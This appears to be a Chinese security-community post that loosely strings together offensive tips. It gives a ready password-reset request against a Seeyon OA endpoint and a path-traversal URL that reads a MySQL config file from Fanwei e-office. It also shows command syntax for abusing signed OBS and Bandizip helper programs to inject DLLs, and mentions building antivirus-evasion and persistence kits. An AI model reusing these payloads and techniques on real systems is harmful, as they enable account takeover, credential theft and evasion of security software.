我实在没想到,2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"XXX321123XXX”,”password":"123456"}
在Quan的上上篇,介绍了一种白文件DLL注入的事:滥用带有签名的DLL注入程序 有大哥发出了一些挖掘思路: 他发现了obs-studio
中的一个DLL注入程序,并且该程序自带混淆 之后逆向了一下,找到了这个程序的使用方式:1. inject-helper64.exe dllname 1 target_threadid inject-helper64.exe dllname 0 target_pid
最后,授人以鱼不如授人以渔
,给出了一些类型,让我们自由探索挖掘1.进程行为监控类软件 2.屏幕、桌面录制、窗口识别、截屏类 3.商业远控类型 4.进程内存管理、搜索、调试类
那么另外一个星球的大哥也是放出了一个程序,就是Bandizip\data
下的RegDll
这个程序,双击会出现它的使用方式,比较好的是,这个似乎可以指定调用某DLL的函数RegDll32.exe /calldll DllPathName,DllFunctionName
泛微e-office OfficeServer2.php 存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。
iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini
倾璇在这篇文章中提供了非常好的示例,用以讲述这个DLL注入器的一些东西,感觉可以试着自己挖掘一下,说不定会有惊喜!
老哥最终还是选择开源了,其实之前一直在看,但是没有过多的学习,最近因为项目上的原因,准备多搞几套免杀方案/维权方案之类的,所以这些东西通通提上日程! go-dll-hiject.zip